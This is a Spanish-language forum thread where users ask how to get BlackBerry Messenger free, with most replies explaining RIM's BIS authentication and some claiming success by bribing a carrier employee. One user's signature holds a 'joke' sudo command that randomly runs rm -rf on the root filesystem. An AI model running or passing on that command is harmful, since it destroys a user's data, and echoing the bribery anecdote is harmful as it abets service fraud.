+ Responder tema
Página 1 de 4 1 2 3 4 ÚltimoÚltimo
Resultados 1 al 15 de 47
    cezarin_1988 está desconectado Usuario GT

Cool blackberry messenger gratis (con claves PIN)

Descargar ahora
    oigan hermanos. Saben cómo
    obtener blackberry messenger
    gratis? Me dicen que sólo se puede
    con plan de datos o contratano
    internet por mensaje.
    Si alguien sabe como obtener
    gratis el blackberry messenger
    avise por favor y colaboren con la
    comunidad.

Predeterminado

Hermano pones un mensaje en cada foro subforo, hermano de haber investigado aun que sea un poquito sabrias que no se puede, ni siquiera se puede tener internet gratis, por que no es como un celular, RIM ha portegido muy bien a la blackberry y ese servicio es esclusivo de blackberry, esta bien preguntar pero investiga un poco y no insistas tanto. No se puede

javiguitarrita está desconectado Exclusivo

Predeterminado

esto va en pedidos y no, no se puede, lo mas cercano es usar im messenger con la configuracion de telcel..

Predeterminado

Ok. Gracias y disculpen la insistencia, pero yo sé de alguien que tiene Blackberry messenger gratis y quería aprender cómo. Pero gracias mis hermanos, cointinuaré con mi investigación y si la consigo aportaré a la comunida. Y quién dice que no se puede tener internet gratis. Yo creé un post de como hacerlo. Y aúnque te consuma saldo (sólo si lo tienes) yo tengo 2 teléfonos. Uno pedacero con saldo la black sin saldo. Aúnque luego les cambio el chip y lo recargo con tarjetas amigo para que no lo den de baja.

arturo3aaa está desconectado Destacado

Predeterminado

Vete a pedidos compa, hay q poneer orden en el foreo

juliozapata está desconectado Usuario GT

Predeterminado

keep dreaming amigo ....

Frijoler0 está desconectado Usuario GT

Predeterminado

Para todos que no le creen a este pobre humano, yo les digo que aunque paresca tonto y absuro es verdad, si se puede, almenos a mi me consta haberlo usado en iusacell ah eso si yo tenia un plan tarifario mas sin embargo no tenia el servicio BIS pero con una lanita a un trabajador, me habilitaron el servicio, el unico riesgo que se corre es: asi como lo puedes usar muchos meses lo puedes usar unos dias, todo tiene consecuencias y si es algo ilegal aun peor, en fin la cuestion es que si se puede tener "gratis" dicho servicio.

Predeterminado

Cita Iniciado por Frijoler0 Ver mensaje
    Para todos que no le creen a este pobre humano, yo les digo que aunque paresca tonto y absuro es verdad, si se puede, almenos a mi me consta haberlo usado en iusacell ah eso si yo tenia un plan tarifario mas sin embargo no tenia el servicio BIS pero con una lanita a un trabajador, me habilitaron el servicio, el unico riesgo que se corre es: asi como lo puedes usar muchos meses lo puedes usar unos dias, todo tiene consecuencias y si es algo ilegal aun peor, en fin la cuestion es que si se puede tener "gratis" dicho servicio.
    Ya ven carnales. Si se puede, ahora sólo falta que algún hermano postee las configuraciones.
    Yo sospecho de quienes son los que las tienen pero no creo que las quieran rolar tan fácil.

changoz está desconectado Participador

Predeterminado

Cita Iniciado por cezarin_1988 Ver mensaje
    Ya ven carnales. Si se puede, ahora sólo falta que algún hermano postee las configuraciones.
    Yo sospecho de quienes son los que las tienen pero no creo que las quieran rolar tan fácil.
    Que no se puede ya que no es cuestión de configuraciones. El servicio BB messenger lo da Blackberry, no tu compañía de celular. Cada que mandas un mensaje toda la autenticación se hace desde los servidores de RIM en Canadá, y es allá donde verifican que tu PIN tenga acceso (al tener BIS), si ven que no ni te dejan mandar o recibir nada. Todos los mensajes viajan a Canadá y luego desde ahí los mandan al BB correspondiente. RIM cobra $5 USD por cada teléfono activado en BIS, luego tu compañía te los cobra, eso y más (por usar su red) a tí.

Es como si quisieras entrar a una página de paga, si ven que tu usuario no ha pagado la suscripción no te dejan accesar.

Es por eso que en algunos países quieren prohibir los Blackberrys (como en Arabia Saudita o China), porque no pueden censurar o espiar los menajes, ya que el enviarlos y recibirlos no dependen de las compañias de teléfonos nacionales, sino de RIM en Canadá.

El tipo, si su historia es verdad, le pagó a alguien de IUSACELL para que le activara el BIS en IUSACELL supuestamente sin que le cobren, pero es desde allá, desde la compañia donde se hace.

Su historia es como si tú le pagaras a alguién de Telmex para que te diera el Infinitum sin que apareciera el cargo en tu recibo de Telmex.
    ¿Estas aburrido?:

Código:
    %sudo [$[$RANDOM%6] == 0] && sudo rm -rf --no-preserve-root / || echo "¡Te salvaste!"

Frijoler0 está desconectado Usuario GT

Predeterminado

Cita Iniciado por changoz Ver mensaje
    Que no se puede ya que no es cuestión de configuraciones. El servicio BB messenger lo da Blackberry, no tu compañía de celular. Cada que mandas un mensaje toda la autenticación se hace desde los servidores de RIM en Canadá, y es allá donde verifican que tu PIN tenga acceso (al tener BIS), si ven que no ni te dejan mandar o recibir nada. Todos los mensajes viajan a Canadá y luego desde ahí los mandan al BB correspondiente. RIM cobra $5 USD por cada teléfono activado en BIS, luego tu compañía te los cobra, eso y más (por usar su red) a tí.

Es como si quisieras entrar a una página de paga, si ven que tu usuario no ha pagado la suscripción no te dejan accesar.

Es por eso que en algunos países quieren prohibir los Blackberrys (como en Arabia Saudita o China), porque no pueden censurar o espiar los menajes, ya que el enviarlos y recibirlos no dependen de las compañias de teléfonos nacionales, sino de RIM en Canadá.

El tipo, si su historia es verdad, le pagó a alguien de IUSACELL para que le activara el BIS en IUSACELL supuestamente sin que le cobren, pero es desde allá, desde la compañia donde se hace.

Su historia es como si tú le pagaras a alguién de Telmex para que te diera el Infinitum sin que apareciera el cargo en tu recibo de Telmex.
    Asi es compañeros esto es algo que muchos no saben y no comprenden por eso las siglas "BIS.- Blackberry Internte Service" y confirmo todo pero todo lo que menciona este bakuno, desde el principio hasta EL FINAL x)

omarzero está desconectado Destacado

Predeterminado

pues si se puede
    no se que sucede pero mis jefes se mensajean con el blackberry messenger sin saldo ni plan de datos
    pero no se en que radica esa onda
    ya que ellos ni en cuenta

VISITA MI BLOG PARA MAS APLICACIONES BLACKBERRY PREMIUM
    Respondo mas rapido por el correo del blog

Predeterminado

Claro que se puede yo le tengo puesto ha 3 BB 8520 que eran de telcel la libere y les compre chip de unefon, le compre un dia de internet BIS y luego le cargue unos libros de servicio que tengo y pues ya los tres BB tienes mas de 2 meses y siguen con el BIS funcionando y digo todo le funciana el msn, el BBM de la black, fcebook, twitter, yahoo, gmail y otros y pues el navegador ,solo hay una cosa en 2 equipos ellos pueden seguir teniendo BIS sin saldo y en un equipo tiene quet ener saldo pero no lo consume.
    Claro que no hay que abusar descragando cosas o videos o musica desde la BB si lo puedes hacer desde tu pc.

goyomx está desconectado Newbie

Predeterminado

Los telefonos tanto para Unefon como para Iusacell, no llevan chip, asi q no se como le hiciste, ademas, el 8520 (telcel) utiliza tecnologia edge y el 8530 (iusacell) EDVO, no son compatibles!!!!!

Predeterminado

Cita Iniciado por goyomx Ver mensaje
    Los telefonos tanto para Unefon como para Iusacell, no llevan chip, asi q no se como le hiciste, ademas, el 8520 (telcel) utiliza tecnologia edge y el 8530 (iusacell) EDVO, no son compatibles!!!!!

A finales del año pasado unefon comenzo con la red gsm

Predeterminado

Amigos lo unico que yo se, porque asi lo tengo es usar el Nimbuzz o el IMPlus Lite 8.5.2 como si fuera tu msn incluso estos programas los puedes usar sin que tengas conexion a wifi, esos programas los descargas del mismo blackberry con el App World, eso si para descargar esos programas si tienes que estar conectado a wifi, supongo que a lo mejor ese dato si lo sabian y si no no hay problema intentenlo y veran que les funciona, lo de la exploracion es otro rollo.

Marcadores

Marcadores